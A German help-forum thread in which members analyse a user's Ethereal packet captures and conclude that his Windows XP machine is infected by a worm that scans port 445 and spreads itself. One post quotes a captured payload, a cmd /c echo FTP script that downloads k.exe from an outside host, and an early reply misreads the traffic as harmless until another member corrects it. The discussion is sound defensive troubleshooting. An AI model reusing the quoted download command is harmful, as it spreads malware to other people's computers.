Hallo Wissende,
ich bin jetzt seit 10 min online, nur bei w-w-w, das Fensterchen mit den Internetverbindungsdaten sagt mir dass schon 2,8 MB Bytes gesendet und 1 MB Bytes empfangen wurden und es zählt laufend weiter hoch.
Wie bekomme ich raus welches Programm sich da mit wem auch immer „unterhält“ bzw. was soll ich tun?
Als Schutz habe ich Antivir installiert auf WinXP.
Danke ^ Gruß
Reinhad
ps: jetzt 15 min Online, gesendet 4 MB, empfangen 1,5 MB
Hallo Reinhard,
das klingt nicht gut, könnte sein, daß Du Viren versendest.
Versuch mal mit Ethereal zu loggen.
Gruß, Rainer
Versuch mal mit Ethereal zu loggen.
Hallo Rainer,
danke für die rasche Hilfe, habe mir das jetzt runtergeladen und installieren lassen.
Ähem, mein Englisch ist nicht so gut, was muss ich jetzt machen?
Gruß
Reinhard
Hallo Reinhard,
klick auf das 2. Icon von links … ‚Show the Capture Options‘
Dann wählst Du bei ‚Interface:‘ die Hardware (Netzwerkkarte?) aus, über die die Verbindung läuft und dann klick auf Start.
Es geht ein Fenster auf, in dem Du siehst, für welches Protokoll Daten fließen. Wenn Du siehst, daß Daten gesammelt wurden, klickst Du auf ‚Stop‘, danach geht das Fenster mit dem Protokoll auf und Du siehst die IPs der Seite, an die die Daten gesendet werden.
Erzähl mal, ob’s geholfen hat.
Gruß, Rainer
Danke dir für deine Mühe,
ich blick da wenig 
Bei Interface werden mir 3 Dinge angeboten:
Generic dialup adapter: \Device\NPF_GenericDialupAdapter
WAN PPP/SLIP)Interface:\Device\NPF_{4C4D9118-E621-47A4-8DE7-34F7D9EAF8EA}
Realtek 8139-series PCI NIC (Microsoft’s Packet Scheduler) :\Device\NPF_{CBDB1620-3513-4B66-88DD-0EBD27E909A0}
Leider habe ich Null Plan was mein Interface ist.
Mein Internetprovider ist Alice (anscheinend hängen die mit HansaNet zusammen), deren Installations-CD habe ich benutzt für die Onlineverbindung. K.A. welches Interface ich da habe.
Ich habe gemacht was du sagtest, dann gabs da eine Option die Aufzeichnung abzuspeichern. Darf ich dir die schicken? Ich erkenne da viele IP-Nummern, aber die ändern sich mehrfach.
Als IOnterface für die Aufzeichnung wählte ich die erste Möglichkeit, also dieses Gneric dialup-Teil.
Da ich nicht mehr ISDN mit DSL habe sondern analog mit DSL macht mich diese Wort „dialup“ leicht nervös, weil ich es mit Dialer verbinde, also diese teuren Nummern
Gruß
Reinhard
Hallo,
ich blick da wenig
mir geht’s leider nicht viel besser, aber ein Protokoll bekomme ich trotzdem. 
Dann kannst Du das auch, wenn ich’s sogar schaffe.
Bei Interface werden mir 3 Dinge angeboten:
Nur drei? Dannn probier die der Reihe nach durch, das dauert doch nur Sekunden.
Generic dialup adapter: \Device\NPF_GenericDialupAdapter
WAN
PPP/SLIP)Interface:\Device\NPF_{4C4D9118-E621-47A4-8DE7-34F7D9EAF8EA}
ahhh, PPP … DSL! Da isser doch.
Realtek 8139-series PCI NIC (Microsoft’s Packet
Scheduler) :\Device\NPF_{CBDB1620-3513-4B66-88DD-0EBD27E909A0}Leider habe ich Null Plan was mein Interface ist.
Mein Internetprovider ist Alice (anscheinend hängen die mit
HansaNet zusammen), deren Installations-CD habe ich benutzt
für die Onlineverbindung. K.A. welches Interface ich da habe.Ich habe gemacht was du sagtest, dann gabs da eine Option die
Aufzeichnung abzuspeichern. Darf ich dir die schicken?
Ach Du hast schon ein Protokoll? Dann hat’s doch schon geklappt!
Ja, natürlich darfst Du das schicken. Ob ich da sehr viel sehe, weiß ich aber noch nicht.
Ich
erkenne da viele IP-Nummern, aber die ändern sich mehrfach.
Als IOnterface für die Aufzeichnung wählte ich die erste
Möglichkeit, also dieses Gneric dialup-Teil.Da ich nicht mehr ISDN mit DSL habe sondern analog mit DSL
macht mich diese Wort „dialup“ leicht nervös, weil ich es mit
Dialer verbinde, also diese teuren Nummern
Nö, Dialup heißt nur anwählen, das hat mit dem Dialer, den Du meinst nichts zu tun. Interessanter ist das verwendete Protokoll und ob in dem Logfile ‚SMTP‘ auftaucht.
Gruß, Rainer
Ach Du hast schon ein Protokoll? Dann hat’s doch schon
geklappt!
Ja, natürlich darfst Du das schicken. Ob ich da sehr viel
sehe, weiß ich aber noch nicht.
Okidoki,
ich protokolliere mal alle 3 Interfaces und sende dir dann die Dateien, oder besser, da du sagst du bist da auch nicht Profi, ich stelle sie ins Internet.
Großen Dank erstmal
Reinhard
Hallo,
ich protokolliere mal alle 3 Interfaces und sende dir dann die
Dateien, oder besser, da du sagst du bist da auch nicht Profi,
ich stelle sie ins Internet.
Großen Dank erstmal
nichts zu danken.
Ich habe gerade mal bei mir den Datenstrom protokolliert, ich konnte wunderbar lesen, daß Daten von w-w-w angefordert wurden und Daten für den Fensteraufbau zurück kamen. Alles recht gut lesbar. Deinem Protokoll wird man ansehen können, was für Daten da fließen. Mach’s nicht zu öffentlich, nicht daß Du Daten veröffentlichst, die nicht in’s Netz gehören, es könnte ja ein trojaner sein, der Deine Kreditkartennummer an verschiedene Server sendet, die steht ann auch im Protokoll.
Gruß, Rainer
Hallo Rainer,
hier die Dateien, k.A. warum die keine Dateiendung haben.
http://rapidshare.de/files/30877494/Mitschnitt.html
http://rapidshare.de/files/30877818/Mitschnitt2.html
http://rapidshare.de/files/30877886/Mitschnitt3.html
Gruß
Reinhard
Hallo Reinhard,
uff (*Schweiß von der Stirn wisch*) scheint nichts schlimmes zu sein, Du hast deinem Windows wohl gesagt, es soll nach Hause telefonieren.
Die Adresse, die immer wieder angewählt wird, ist Microsoft. (Microsoft.ds)
Dazu habe ich das hier gefunden …
Hallo,
Microsoft-DS ist in RFC 1700 gelistet und läuft auf Port 445 tcp/udp.
http://www.ietf.org/rfc/rfc1700.txt
Was tut dieser Dienst?
Nun er ist dazu da um das SMB Protokoll (Server Message Block, Ports 137-139) abzulösen, das das "alte" Filesharing über NetBios darstellte (Win9x/NT4).
Der Dienst heisst Microsoft CIFS (Microsoft Common Internet File System) und übernimmt also die Kommunikation über das Windows Netz für Freigaben uws.
Server message block (SMB) over IP (Microsoft-DS): http://support.microsoft.com/default...EN-US;Q204279&
Port 445: http://ntsecurity.nu/papers/port445/
Ergo: In einer reinen Windows 2000 Umgebung ohne NetBios Protokoll wird also nur noch Port 445 tcp/udp für die Windows Dateifreigabe genutzt.
Durch Deaktivieren von NetBios über TCP/IP verhindert man auch, daß sich ältere Windowssysteme mit einer 2k/XP Maschine verbinden können...
Ist beides aktiviert, wird microsoft-ds bevorzugt verwendet.
Du mußt also den Dienst Microsoft CIFS anschalten, dann hört das wohl auf. Hast Du kürzlich einen Drucker im Netzwerk frei gegeben und Netbios aktiviert?
Gruß, Rainer
Okay, letzten sehr großen Dank für jetzt, ist schon spät/früh.
Das beruhigt mich und wenn ich schon mit Bill telefoniere, na wart ab dem werd ich was erzählen dem billigen Softwaredieb
Nein, ich habe nur Einzelplatz-PC, nix mit Freigabe oder so, zumindest ich machte da gar nichts. Ich prüfe das heute wie ich da was abstellen kann.
Gute Nacht
Lieben Gruß
Reinhad
Hallo Reinhard,
im dritten Protokoll habe ich noch etwas gefunden …
DCERPC … in der Dritten Zeile staht dann zwar ‚Access denied‘ (Zugriff verboten) aber trotzdem, Du solltest unbedingt mal Deine Dienste prüfen, da versucht jemand Deinen Rechner fernzusteuern, würde ich das interpretieren.
Besuche mal http://www.dingens.org da solltest Du ein Tool finden, das die die überflüssigen Dienste abschaltet, dann sollte das aufhören.
Gruß, Rainer
Hallo Reinhard,
ich habe noch ein wenig weiter gesucht …
Eine Zeile im 2.Protokoll:
’ buddy: lilli marleen
’
hmmm. Etwas weiter …
‚h˜þŠWÿçèîÿÿÿcmd /c echo open download.web-scr.com.ar 65021>> bla.txt &echo user webscr webscrdownpass >> bla.txt &echo binary >> bla.txt&echo get k.exe >> bla.txt&echo quit‘
Sieh doch mal nach, ob Du jetzt eine Datei k.exe auf dem Rechner hast …
Und:
’ DerTod: das ultimative Diamanda Galas Kwiss folgt in der Walpurgisnacht
’
Ich glaube, Du mußt Deinen Rechner neu aufsetzen.
Mal sehen, ob noch ein Experte etwas dazu sagt.
Gruß, Rainer
Fernsteuerung? Experten gefragt.
Hallo Reinhard,
Gamer hat unten noch etwas interessantes geschrieben:
http://www.wer-weiss-was.de/cgi-bin/forum/showarchiv…
Das gilt auch für Dich, alle Passwörter, die Du mit dem Computer verwendet hast, mußt Du ändern, denn …
‚PC NETWORK PROGRAM 1.0…LANMAN1.0…Windows for Workgroups 3.1a…LM1.2X002…LANMAN2.1…NT LM‘
… in Deinen Logfiles deutet für mich als Laie darauf hin, daß Dein Computer zeitweise ‚ferngesteuert‘ wird. Suche ich mit Google nach ‚Lanman‘, lande ich bei Samba …
Ich würde davon ausgehen, daß ein Hacker alle Deine Passwörter kennt und Deinen Computer intensiver verwendet als Du.
Will denn nicht doch mal ein Experte etwas dazu sagen? Ich fühle mich nicht wohl bei dem Quizz, ich halte mich nicht für kompetent genug für eine klare Aussage. Wär’s mein Computer, würde ich ihn schnelllstmöglich plätten.
Gruß, Rainer
Neuinstallation fällig
uff (*Schweiß von der Stirn wisch*) scheint nichts schlimmes
zu sein, Du hast deinem Windows wohl gesagt, es soll nach
Hause telefonieren.
Die Adresse, die immer wieder angewählt wird, ist Microsoft.
(Microsoft.ds)
Die Adresse ist nicht Microsoft, es handelt sich vielmehr um Port 445, den Reinhards Rechner auf verschiedenen Rechnern im HanseNet bzw. im Netz 85.180.0.0/16 anfragt. Ein Programm auf seinem Rechner versucht also, mittels brute force Windows-Freigaben auf fremden Rechnern zu finden. Antwortet der fremde Rechner dann, versucht Reinhards Rechner dort eine Command-Shell zu starten und über diese auf dem fremden Rechner ein Programm (k.exe) downzuloaden und zu starten.
Sieht ein bisschen nach den von kriminellen sogenannten ‚Domain-Engeln‘ vertriebenen Tools aus, klar ist jedenfalls, dass Reinhards Rechner infiziert ist und versucht, diese Infektion aktiv im Netz zu verbreiten. Auf eine aktive Fernsteuerung dieses Rechners durch dritte habe ich hingegen beim (allerdings recht flüchtigen) Überfliegen der Logs keine Hinweise gefunden.
Gruss
Schorsch
Gruss
Schorsch
1 „Gefällt mir“
Hallo Schorsch & Rainer,
ja, es gibt da eine k.exe auf dem PC. Das Deaktivieren der Dienste brachte nichts.
Aktuell ist der Datenfluß gestoppt durch Installation von Zonealarm.
Ich gehe davon aus dass mein Rechner somit momentan nicht auf andere Rechner zugreift.
Mir ist klar geworden dass ich um eine Formatierung der Festplatte nicht herumkomme.
Nochmals Danke und noch einen schönen Sonntag
Reinhard
Die Adresse ist nicht Microsoft, es handelt sich vielmehr um
Port 445, den Reinhards Rechner auf verschiedenen Rechnern im
HanseNet bzw. im Netz 85.180.0.0/16 anfragt. Ein Programm auf
seinem Rechner versucht also, mittels brute force
Windows-Freigaben auf fremden Rechnern zu finden. Antwortet
der fremde Rechner dann, versucht Reinhards Rechner dort eine
Command-Shell zu starten und über diese auf dem fremden
Rechner ein Programm (k.exe) downzuloaden und zu starten.Sieht ein bisschen nach den von kriminellen sogenannten
‚Domain-Engeln‘ vertriebenen Tools aus, klar ist jedenfalls,
dass Reinhards Rechner infiziert ist und versucht, diese
Infektion aktiv im Netz zu verbreiten. Auf eine aktive
Fernsteuerung dieses Rechners durch dritte habe ich hingegen
beim (allerdings recht flüchtigen) Überfliegen der Logs keine
Hinweise gefunden.Gruss
SchorschGruss
Schorsch
Hallo Schorsch,
danke! Endlich mal Jemand mit Ahnung.
Eigentlich wollte ich ja nur helfen, die Logfiles zu erstellen, hat ja auch funktioniert. Schade, die erste Vermutung war dann wohl doch richtig, da arbeitet Schadsoftware.
Gruß, Rainer